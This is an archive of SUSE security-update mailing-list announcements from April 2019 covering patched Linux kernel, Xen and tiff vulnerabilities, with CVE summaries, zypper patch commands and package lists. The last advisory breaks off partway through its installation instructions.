From sle-security-updates at lists.suse.com Mon Apr 1 07:09:52 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 15:09:52 +0200 (CEST)
Subject: SUSE-SU-2019:0828-1: important: Security update for the Linux Kernel
Message-ID: <20190401130952.14C7CFF2D@maintenance.suse.de>

SUSE Security Update: Security update for the Linux Kernel
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0828-1
Rating:             important
References:         #1012382 #1075697 #1082943 #1098599 #1102959 #1105402
                    #1107829 #1108145 #1109137 #1109330 #1110286 #1117645
                    #1119019 #1120691 #1121698 #1121805 #1122821 #1124728
                    #1124732 #1124735 #1125315 #1127155 #1127758 #1127961
                    #1128166 #1129080 #1129179
Cross-References:   CVE-2018-14633 CVE-2019-2024 CVE-2019-6974 CVE-2019-7221
                    CVE-2019-7222 CVE-2019-9213
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise High Availability 12-SP2
                    SUSE Enterprise Storage 4
                    OpenStack Cloud Magnum Orchestration 7
______________________________________________________________________________

An update that solves 6 vulnerabilities and has 21 fixes is now available.

Description:

The SUSE Linux Enterprise 12 SP2 LTSS kernel was updated to receive various security and bugfixes.

The following security bugs were fixed:

- CVE-2019-2024: A use-after-free when disconnecting a source, which could lead to crashes, was fixed (bnc#1129179).
- CVE-2019-9213: expand_downwards in mm/mmap.c lacked a check for the mmap minimum address, which made it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task (bnc#1128166).
- CVE-2018-14633: A security flaw was found in the chap_server_compute_md5() function in the iSCSI target code in the Linux kernel, in the way an authentication request from an iSCSI initiator is processed (bnc#1107829).
- CVE-2019-7221: The KVM implementation in the Linux kernel had a use-after-free (bnc#1124732).
- CVE-2019-7222: The KVM implementation in the Linux kernel had an information leak (bnc#1124735).
- CVE-2019-6974: kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandled reference counting because of a race condition, which led to a use-after-free (bnc#1124728).

The following non-security bugs were fixed:

- copy_mount_string: Limit string length to PATH_MAX (bsc#1082943).
- enic: add wq clean up budget (bsc#1075697, bsc#1120691, bsc#1102959).
- ibmvscsi: Fix empty event pool access during host removal (bsc#1119019).
- ipv4: ipv6: Adjust the frag mem limit after truesize has been changed (bsc#1110286).
- kmps: obsolete older KMPs of the same flavour (bsc#1127155, bsc#1109137).
- netfilter: ipv6: Adjust the frag mem limit after truesize has been changed (bsc#1110286).
- perf/x86: Add sysfs entry to freeze counters on SMI (bsc#1121805).
- perf/x86/intel: Delay memory deallocation until x86_pmu_dead_cpu() (bsc#1121805).
- perf/x86/intel: Do not enable freeze-on-smi for PerfMon V1 (bsc#1121805).
- perf/x86/intel: Fix memory corruption (bsc#1121805).
- perf/x86/intel: Generalize dynamic constraint creation (bsc#1121805).
- perf/x86/intel: Implement support for TSX Force Abort (bsc#1121805).
- perf/x86/intel: Make cpuc allocations consistent (bsc#1121805).
- pseries/energy: Use OF accessor function to read ibm,drc-indexes (bsc#1129080).
- restore cond_resched() in shrink_dcache_parent() (bsc#1098599, bsc#1105402, bsc#1127758).
- rps: flow_dissector: Fix uninitialized flow_keys used in __skb_get_hash possibly (bsc#1108145).
- scsi: megaraid_sas: Send SYNCHRONIZE_CACHE for VD to firmware (bsc#1121698).
- scsi: sym53c8xx: fix NULL pointer dereference panic in sym_int_sir() (bsc#1125315).
- x86: Add TSX Force Abort CPUID/MSR (bsc#1121805).
- x86: respect memory size limiting via mem= parameter (bsc#1117645).
- x86/spectre_v2: Do not check microcode versions when running under hypervisors (bsc#1122821).
- x86/xen: dont add memory above max allowed allocation (bsc#1117645).
- xen-netfront: Fix hang on device removal (bnc#1012382).
- xfrm: use complete IPv6 addresses for hash (bsc#1109330).
- xfs: remove filestream item xfs_inode reference (bsc#1127961).

Special Instructions and Notes:

Please reboot the system after installing this update.

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE OpenStack Cloud 7:
    zypper in -t patch SUSE-OpenStack-Cloud-7-2019-828=1
- SUSE Linux Enterprise Server for SAP 12-SP2:
    zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-828=1
- SUSE Linux Enterprise Server 12-SP2-LTSS:
    zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-828=1
- SUSE Linux Enterprise Server 12-SP2-BCL:
    zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-828=1
- SUSE Linux Enterprise High Availability 12-SP2:
    zypper in -t patch SUSE-SLE-HA-12-SP2-2019-828=1
- SUSE Enterprise Storage 4:
    zypper in -t patch SUSE-Storage-4-2019-828=1
- OpenStack Cloud Magnum Orchestration 7:
    zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-828=1

Package List:

- SUSE OpenStack Cloud 7 (s390x x86_64):
    kernel-default-4.4.121-92.104.1
    kernel-default-base-4.4.121-92.104.1
    kernel-default-base-debuginfo-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1
    kernel-default-devel-4.4.121-92.104.1
    kernel-syms-4.4.121-92.104.1
- SUSE OpenStack Cloud 7 (noarch):
    kernel-devel-4.4.121-92.104.1
    kernel-macros-4.4.121-92.104.1
    kernel-source-4.4.121-92.104.1
- SUSE OpenStack Cloud 7 (x86_64):
    kgraft-patch-4_4_121-92_104-default-1-3.3.1
- SUSE OpenStack Cloud 7 (s390x):
    kernel-default-man-4.4.121-92.104.1
- SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):
    kernel-default-4.4.121-92.104.1
    kernel-default-base-4.4.121-92.104.1
    kernel-default-base-debuginfo-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1
    kernel-default-devel-4.4.121-92.104.1
    kernel-syms-4.4.121-92.104.1
    kgraft-patch-4_4_121-92_104-default-1-3.3.1
- SUSE Linux Enterprise Server for SAP 12-SP2 (noarch):
    kernel-devel-4.4.121-92.104.1
    kernel-macros-4.4.121-92.104.1
    kernel-source-4.4.121-92.104.1
- SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):
    kernel-default-4.4.121-92.104.1
    kernel-default-base-4.4.121-92.104.1
    kernel-default-base-debuginfo-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1
    kernel-default-devel-4.4.121-92.104.1
    kernel-syms-4.4.121-92.104.1
- SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le x86_64):
    kgraft-patch-4_4_121-92_104-default-1-3.3.1
- SUSE Linux Enterprise Server 12-SP2-LTSS (noarch):
    kernel-devel-4.4.121-92.104.1
    kernel-macros-4.4.121-92.104.1
    kernel-source-4.4.121-92.104.1
- SUSE Linux Enterprise Server 12-SP2-LTSS (s390x):
    kernel-default-man-4.4.121-92.104.1
- SUSE Linux Enterprise Server 12-SP2-BCL (noarch):
    kernel-devel-4.4.121-92.104.1
    kernel-macros-4.4.121-92.104.1
    kernel-source-4.4.121-92.104.1
- SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
    kernel-default-4.4.121-92.104.1
    kernel-default-base-4.4.121-92.104.1
    kernel-default-base-debuginfo-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1
    kernel-default-devel-4.4.121-92.104.1
    kernel-syms-4.4.121-92.104.1
- SUSE Linux Enterprise High Availability 12-SP2 (ppc64le s390x x86_64):
    cluster-md-kmp-default-4.4.121-92.104.1
    cluster-md-kmp-default-debuginfo-4.4.121-92.104.1
    cluster-network-kmp-default-4.4.121-92.104.1
    cluster-network-kmp-default-debuginfo-4.4.121-92.104.1
    dlm-kmp-default-4.4.121-92.104.1
    dlm-kmp-default-debuginfo-4.4.121-92.104.1
    gfs2-kmp-default-4.4.121-92.104.1
    gfs2-kmp-default-debuginfo-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1
    ocfs2-kmp-default-4.4.121-92.104.1
    ocfs2-kmp-default-debuginfo-4.4.121-92.104.1
- SUSE Enterprise Storage 4 (noarch):
    kernel-devel-4.4.121-92.104.1
    kernel-macros-4.4.121-92.104.1
    kernel-source-4.4.121-92.104.1
- SUSE Enterprise Storage 4 (x86_64):
    kernel-default-4.4.121-92.104.1
    kernel-default-base-4.4.121-92.104.1
    kernel-default-base-debuginfo-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1
    kernel-default-devel-4.4.121-92.104.1
    kernel-syms-4.4.121-92.104.1
    kgraft-patch-4_4_121-92_104-default-1-3.3.1
- OpenStack Cloud Magnum Orchestration 7 (x86_64):
    kernel-default-4.4.121-92.104.1
    kernel-default-debuginfo-4.4.121-92.104.1
    kernel-default-debugsource-4.4.121-92.104.1

References:

https://www.suse.com/security/cve/CVE-2018-14633.html
https://www.suse.com/security/cve/CVE-2019-2024.html
https://www.suse.com/security/cve/CVE-2019-6974.html
https://www.suse.com/security/cve/CVE-2019-7221.html
https://www.suse.com/security/cve/CVE-2019-7222.html
https://www.suse.com/security/cve/CVE-2019-9213.html
https://bugzilla.suse.com/1012382
https://bugzilla.suse.com/1075697
https://bugzilla.suse.com/1082943
https://bugzilla.suse.com/1098599
https://bugzilla.suse.com/1102959
https://bugzilla.suse.com/1105402
https://bugzilla.suse.com/1107829
https://bugzilla.suse.com/1108145
https://bugzilla.suse.com/1109137
https://bugzilla.suse.com/1109330
https://bugzilla.suse.com/1110286
https://bugzilla.suse.com/1117645
https://bugzilla.suse.com/1119019
https://bugzilla.suse.com/1120691
https://bugzilla.suse.com/1121698
https://bugzilla.suse.com/1121805
https://bugzilla.suse.com/1122821
https://bugzilla.suse.com/1124728
https://bugzilla.suse.com/1124732
https://bugzilla.suse.com/1124735
https://bugzilla.suse.com/1125315
https://bugzilla.suse.com/1127155
https://bugzilla.suse.com/1127758
https://bugzilla.suse.com/1127961
https://bugzilla.suse.com/1128166
https://bugzilla.suse.com/1129080
https://bugzilla.suse.com/1129179

From sle-security-updates at lists.suse.com Mon Apr 1 07:16:22 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 15:16:22 +0200 (CEST)
Subject: SUSE-SU-2019:14001-1: important: Security update for xen
Message-ID: <20190401131622.459F9FF2D@maintenance.suse.de>

SUSE Security Update: Security update for xen
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14001-1
Rating:             important
References:         #1027519 #1031382 #1123157 #1126140 #1126141 #1126192
                    #1126195 #1126196 #1126198 #1126201 #1127400 #1129623
Cross-References:   CVE-2019-6778 CVE-2019-9824
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 11-SP4
                    SUSE Linux Enterprise Server 11-SP4
                    SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

An update that solves two vulnerabilities and has 10 fixes is now available.

Description:

This update for xen fixes the following issues:

Security issues fixed:

- Fixed multiple access violations introduced by the XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192).
- Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201).
- Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables, leading to privilege escalation (bsc#1126195).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126196).
- CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157).
- Fixed an issue which could allow malicious PV guests to cause a host crash or gain access to data pertaining to other guests. Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198).
- Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400).
- Fixed an issue which could allow malicious or buggy guests with passed-through PCI devices to escalate their privileges, crash the host, or access data belonging to other guests. Additionally, memory leaks were also possible (bsc#1126140).
- Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141).
- CVE-2019-9824: Fixed an information leak in the SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623).

Other issues fixed:

- Fixed an issue where VMs crashed when migrating between dom0 hosts (bsc#1031382).
- Upstream bug fixes (bsc#1027519).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Software Development Kit 11-SP4:
    zypper in -t patch sdksp4-xen-14001=1
- SUSE Linux Enterprise Server 11-SP4:
    zypper in -t patch slessp4-xen-14001=1
- SUSE Linux Enterprise Debuginfo 11-SP4:
    zypper in -t patch dbgsp4-xen-14001=1

Package List:

- SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 x86_64):
    xen-devel-4.4.4_40-61.43.2
- SUSE Linux Enterprise Server 11-SP4 (i586 x86_64):
    xen-kmp-default-4.4.4_40_3.0.101_108.87-61.43.2
    xen-libs-4.4.4_40-61.43.2
    xen-tools-domU-4.4.4_40-61.43.2
- SUSE Linux Enterprise Server 11-SP4 (x86_64):
    xen-4.4.4_40-61.43.2
    xen-doc-html-4.4.4_40-61.43.2
    xen-libs-32bit-4.4.4_40-61.43.2
    xen-tools-4.4.4_40-61.43.2
- SUSE Linux Enterprise Server 11-SP4 (i586):
    xen-kmp-pae-4.4.4_40_3.0.101_108.87-61.43.2
- SUSE Linux Enterprise Debuginfo 11-SP4 (i586 x86_64):
    xen-debuginfo-4.4.4_40-61.43.2
    xen-debugsource-4.4.4_40-61.43.2

References:

https://www.suse.com/security/cve/CVE-2019-6778.html
https://www.suse.com/security/cve/CVE-2019-9824.html
https://bugzilla.suse.com/1027519
https://bugzilla.suse.com/1031382
https://bugzilla.suse.com/1123157
https://bugzilla.suse.com/1126140
https://bugzilla.suse.com/1126141
https://bugzilla.suse.com/1126192
https://bugzilla.suse.com/1126195
https://bugzilla.suse.com/1126196
https://bugzilla.suse.com/1126198
https://bugzilla.suse.com/1126201
https://bugzilla.suse.com/1127400
https://bugzilla.suse.com/1129623

From sle-security-updates at lists.suse.com Mon Apr 1 07:18:42 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 15:18:42 +0200 (CEST)
Subject: SUSE-SU-2019:0827-1: important: Security update for xen
Message-ID: <20190401131842.348C7FF2D@maintenance.suse.de>

SUSE Security Update: Security update for xen
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0827-1
Rating:             important
References:
                    #1027519 #1056336 #1105528 #1108940 #1110924 #1111007
                    #1111011 #1111014 #1112188 #1114423 #1114988 #1115040
                    #1115045 #1115047 #1117756 #1123157 #1126140 #1126141
                    #1126192 #1126195 #1126196 #1126198 #1126201 #1127400
                    #1129623
Cross-References:   CVE-2017-13672 CVE-2018-10839 CVE-2018-17958 CVE-2018-17962
                    CVE-2018-17963 CVE-2018-18438 CVE-2018-18849 CVE-2018-19665
                    CVE-2018-19961 CVE-2018-19962 CVE-2018-19965 CVE-2018-19966
                    CVE-2018-19967 CVE-2019-6778 CVE-2019-9824
Affected Products:
                    SUSE Linux Enterprise Server 12-LTSS
______________________________________________________________________________

An update that solves 15 vulnerabilities and has 10 fixes is now available.

Description:

This update for xen fixes the following issues:

Security issues fixed:

- CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157).
- CVE-2017-13672: Fixed an out of bounds read access during display update (bsc#1056336).
- Fixed an issue which could allow malicious or buggy guests with passed-through PCI devices to escalate their privileges, crash the host, or access data belonging to other guests. Additionally, memory leaks were also possible (bsc#1126140).
- Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141).
- CVE-2018-18849: Fixed an out of bounds msg buffer access which could lead to denial of service (bsc#1114423).
- Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201).
- CVE-2018-17958: Fixed an integer overflow leading to a buffer overflow in the rtl8139 component (bsc#1111007).
- CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS) (XSA-282) (bsc#1114988).
- CVE-2018-19665: Fixed an integer overflow resulting in memory corruption in various Bluetooth functions, allowing a crash of the qemu process resulting in Denial of Service (DoS) (bsc#1117756).
- CVE-2019-9824: Fixed an information leak in the SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623).
- CVE-2018-19961, CVE-2018-19962: Fixed an issue related to insufficient TLB flushing with AMD IOMMUs, which potentially allowed a guest to escalate its privileges, cause a Denial of Service (DoS) affecting the entire host, or access data it is not supposed to access (XSA-275) (bsc#1115040).
- CVE-2018-19966: Fixed an issue related to a previous fix for XSA-240, which conflicted with shadow paging and allowed a guest to cause Xen to crash, resulting in a Denial of Service (DoS) (XSA-280) (bsc#1115047).
- CVE-2018-10839: Fixed an integer overflow leading to a buffer overflow in the ne2000 component (bsc#1110924).
- CVE-2018-19965: Fixed an issue related to the INVPCID instruction in case non-canonical addresses are accessed, which may allow a guest to cause Xen to crash, resulting in a Denial of Service (DoS) affecting the entire host (XSA-279) (bsc#1115045).
- Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400).
- Fixed an issue which could allow malicious PV guests to cause a host crash or gain access to data pertaining to other guests. Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198).
- Fixed multiple access violations introduced by the XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192).
- CVE-2018-17963: Fixed an integer overflow in relation to large packet sizes, leading to a denial of service (DoS) (bsc#1111014).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126196).
- Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables, leading to privilege escalation (bsc#1126195).
- CVE-2018-17962: Fixed an integer overflow leading to a buffer overflow in the pcnet component (bsc#1111011).
- CVE-2018-18438: Fixed an integer overflow in the ccid_card_vscard_read function which could lead to memory corruption (bsc#1112188).

Other issues fixed:

- Upstream bug fixes (bsc#1027519).
- Fixed an issue where a XEN SLE12-SP1 domU hangs on a SLE12-SP3 HV (bsc#1108940).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server 12-LTSS:
    zypper in -t patch SUSE-SLE-SERVER-12-2019-827=1

Package List:

- SUSE Linux Enterprise Server 12-LTSS (x86_64):
    xen-4.4.4_40-22.77.1
    xen-debugsource-4.4.4_40-22.77.1
    xen-doc-html-4.4.4_40-22.77.1
    xen-kmp-default-4.4.4_40_k3.12.61_52.146-22.77.1
    xen-kmp-default-debuginfo-4.4.4_40_k3.12.61_52.146-22.77.1
    xen-libs-32bit-4.4.4_40-22.77.1
    xen-libs-4.4.4_40-22.77.1
    xen-libs-debuginfo-32bit-4.4.4_40-22.77.1
    xen-libs-debuginfo-4.4.4_40-22.77.1
    xen-tools-4.4.4_40-22.77.1
    xen-tools-debuginfo-4.4.4_40-22.77.1
    xen-tools-domU-4.4.4_40-22.77.1
    xen-tools-domU-debuginfo-4.4.4_40-22.77.1

References:

https://www.suse.com/security/cve/CVE-2017-13672.html
https://www.suse.com/security/cve/CVE-2018-10839.html
https://www.suse.com/security/cve/CVE-2018-17958.html
https://www.suse.com/security/cve/CVE-2018-17962.html
https://www.suse.com/security/cve/CVE-2018-17963.html
https://www.suse.com/security/cve/CVE-2018-18438.html
https://www.suse.com/security/cve/CVE-2018-18849.html
https://www.suse.com/security/cve/CVE-2018-19665.html
https://www.suse.com/security/cve/CVE-2018-19961.html
https://www.suse.com/security/cve/CVE-2018-19962.html
https://www.suse.com/security/cve/CVE-2018-19965.html
https://www.suse.com/security/cve/CVE-2018-19966.html
https://www.suse.com/security/cve/CVE-2018-19967.html
https://www.suse.com/security/cve/CVE-2019-6778.html
https://www.suse.com/security/cve/CVE-2019-9824.html
https://bugzilla.suse.com/1027519
https://bugzilla.suse.com/1056336
https://bugzilla.suse.com/1105528
https://bugzilla.suse.com/1108940
https://bugzilla.suse.com/1110924
https://bugzilla.suse.com/1111007
https://bugzilla.suse.com/1111011
https://bugzilla.suse.com/1111014
https://bugzilla.suse.com/1112188
https://bugzilla.suse.com/1114423
https://bugzilla.suse.com/1114988
https://bugzilla.suse.com/1115040
https://bugzilla.suse.com/1115045
https://bugzilla.suse.com/1115047
https://bugzilla.suse.com/1117756
https://bugzilla.suse.com/1123157
https://bugzilla.suse.com/1126140
https://bugzilla.suse.com/1126141
https://bugzilla.suse.com/1126192
https://bugzilla.suse.com/1126195
https://bugzilla.suse.com/1126196
https://bugzilla.suse.com/1126198
https://bugzilla.suse.com/1126201
https://bugzilla.suse.com/1127400
https://bugzilla.suse.com/1129623

From sle-security-updates at lists.suse.com Mon Apr 1 07:22:30 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 15:22:30 +0200 (CEST)
Subject: SUSE-SU-2019:0825-1: important: Security update for xen
Message-ID: <20190401132230.52BA3FF2D@maintenance.suse.de>

SUSE Security Update: Security update for xen
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0825-1
Rating:             important
References:         #1056336 #1110924 #1111007 #1111011 #1111014 #1112188
                    #1114423 #1114988 #1115040 #1115047 #1117756 #1123157
                    #1126140 #1126141 #1126192 #1126195 #1126196 #1126201
                    #1129623
Cross-References:   CVE-2017-13672 CVE-2018-10839 CVE-2018-17958 CVE-2018-17962
                    CVE-2018-17963 CVE-2018-18438 CVE-2018-18849 CVE-2018-19665
                    CVE-2018-19961 CVE-2018-19962 CVE-2018-19966 CVE-2018-19967
                    CVE-2019-6778 CVE-2019-9824
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP1-LTSS
______________________________________________________________________________

An update that solves 14 vulnerabilities and has 5 fixes is now available.

Description:

This update for xen fixes the following issues:

Security issues fixed:

- CVE-2018-18849: Fixed an out of bounds memory access issue that was found in the LSI53C895A SCSI Host Bus Adapter emulation while writing a message in lsi_do_msgin. It could occur during migration if the 'msg_len' field has an invalid value. A user/process could use this flaw to crash the Qemu process, resulting in DoS (bsc#1114423).
- CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS) (XSA-282) (bsc#1114988).
- CVE-2018-19665: Fixed an integer overflow in Bluetooth routines that allowed memory corruption (bsc#1117756).
- CVE-2018-18438: Fixed an integer overflow in the ccid_card_vscard_read function which allowed memory corruption (bsc#1112188).
- CVE-2018-17962: Fixed a buffer overflow in pcnet_receive in hw/net/pcnet.c caused by use of an incorrect integer data type (bsc#1111011).
- Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201).
- CVE-2018-19961, CVE-2018-19962: Fixed insufficient TLB flushing / improper large page mappings with AMD IOMMUs (XSA-275) (bsc#1115040).
- CVE-2018-17963: Fixed qemu_deliver_packet_iov in net/net.c, which accepted packet sizes greater than INT_MAX and allowed attackers to cause a denial of service or possibly have unspecified other impact (bsc#1111014).
- Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables, leading to privilege escalation (bsc#1126195).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126196).
- CVE-2018-17958: Fixed a buffer overflow in rtl8139_do_receive in hw/net/rtl8139.c caused by use of an incorrect integer data type (bsc#1111007).
- CVE-2018-10839: Fixed an integer overflow which could lead to a buffer overflow issue (bsc#1110924).
- CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157).
- CVE-2018-19966: Fixed an issue introduced by XSA-240 that could have caused conflicts with shadow paging (XSA-280) (bsc#1115047).
- CVE-2017-13672: Fixed an out of bounds read access during display update (bsc#1056336).
- Fixed multiple access violations introduced by the XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192).
- Fixed an issue which could allow malicious or buggy guests with passed-through PCI devices to escalate their privileges, crash the host, or access data belonging to other guests. Additionally, memory leaks were also possible (bsc#1126140).
- Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141).
- CVE-2019-9824: Fixed an information leak in the SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:
    zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-825=1
- SUSE Linux Enterprise Server 12-SP1-LTSS:
    zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-825=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
    xen-4.5.5_28-22.58.1
    xen-debugsource-4.5.5_28-22.58.1
    xen-doc-html-4.5.5_28-22.58.1
    xen-kmp-default-4.5.5_28_k3.12.74_60.64.107-22.58.1
    xen-kmp-default-debuginfo-4.5.5_28_k3.12.74_60.64.107-22.58.1
    xen-libs-32bit-4.5.5_28-22.58.1
    xen-libs-4.5.5_28-22.58.1
    xen-libs-debuginfo-32bit-4.5.5_28-22.58.1
    xen-libs-debuginfo-4.5.5_28-22.58.1
    xen-tools-4.5.5_28-22.58.1
    xen-tools-debuginfo-4.5.5_28-22.58.1
    xen-tools-domU-4.5.5_28-22.58.1
    xen-tools-domU-debuginfo-4.5.5_28-22.58.1
- SUSE Linux Enterprise Server 12-SP1-LTSS (x86_64):
    xen-4.5.5_28-22.58.1
    xen-debugsource-4.5.5_28-22.58.1
    xen-doc-html-4.5.5_28-22.58.1
    xen-kmp-default-4.5.5_28_k3.12.74_60.64.107-22.58.1
    xen-kmp-default-debuginfo-4.5.5_28_k3.12.74_60.64.107-22.58.1
    xen-libs-32bit-4.5.5_28-22.58.1
    xen-libs-4.5.5_28-22.58.1
    xen-libs-debuginfo-32bit-4.5.5_28-22.58.1
    xen-libs-debuginfo-4.5.5_28-22.58.1
    xen-tools-4.5.5_28-22.58.1
    xen-tools-debuginfo-4.5.5_28-22.58.1
    xen-tools-domU-4.5.5_28-22.58.1
    xen-tools-domU-debuginfo-4.5.5_28-22.58.1

References:

https://www.suse.com/security/cve/CVE-2017-13672.html
https://www.suse.com/security/cve/CVE-2018-10839.html
https://www.suse.com/security/cve/CVE-2018-17958.html
https://www.suse.com/security/cve/CVE-2018-17962.html
https://www.suse.com/security/cve/CVE-2018-17963.html
https://www.suse.com/security/cve/CVE-2018-18438.html
https://www.suse.com/security/cve/CVE-2018-18849.html
https://www.suse.com/security/cve/CVE-2018-19665.html
https://www.suse.com/security/cve/CVE-2018-19961.html
https://www.suse.com/security/cve/CVE-2018-19962.html
https://www.suse.com/security/cve/CVE-2018-19966.html
https://www.suse.com/security/cve/CVE-2018-19967.html
https://www.suse.com/security/cve/CVE-2019-6778.html
https://www.suse.com/security/cve/CVE-2019-9824.html
https://bugzilla.suse.com/1056336
https://bugzilla.suse.com/1110924
https://bugzilla.suse.com/1111007
https://bugzilla.suse.com/1111011
https://bugzilla.suse.com/1111014
https://bugzilla.suse.com/1112188
https://bugzilla.suse.com/1114423
https://bugzilla.suse.com/1114988
https://bugzilla.suse.com/1115040
https://bugzilla.suse.com/1115047
https://bugzilla.suse.com/1117756
https://bugzilla.suse.com/1123157
https://bugzilla.suse.com/1126140
https://bugzilla.suse.com/1126141
https://bugzilla.suse.com/1126192
https://bugzilla.suse.com/1126195
https://bugzilla.suse.com/1126196
https://bugzilla.suse.com/1126201
https://bugzilla.suse.com/1129623

From sle-security-updates at lists.suse.com Mon Apr 1 07:25:18 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 15:25:18 +0200 (CEST)
Subject: SUSE-SU-2019:14002-1: Security update for tiff
Message-ID: <20190401132518.247C1FF2D@maintenance.suse.de>

SUSE Security Update: Security update for tiff
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14002-1
Rating:             low
References:         #1121626 #983268
Cross-References:   CVE-2016-5102 CVE-2019-6128
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 11-SP4
                    SUSE Linux Enterprise Server 11-SP4
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

An update that fixes two vulnerabilities is now available.
Description:

   This update for tiff fixes the following issues:

   Security vulnerabilities fixed:

   - CVE-2016-5102: Fixed a buffer overflow in readgifimage() (bsc#983268)
   - CVE-2019-6128: Fixed a memory leak in the TIFFFdOpen function in
     tif_unix.c (bsc#1121626)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 11-SP4:

      zypper in -t patch sdksp4-tiff-14002=1

   - SUSE Linux Enterprise Server 11-SP4:

      zypper in -t patch slessp4-tiff-14002=1

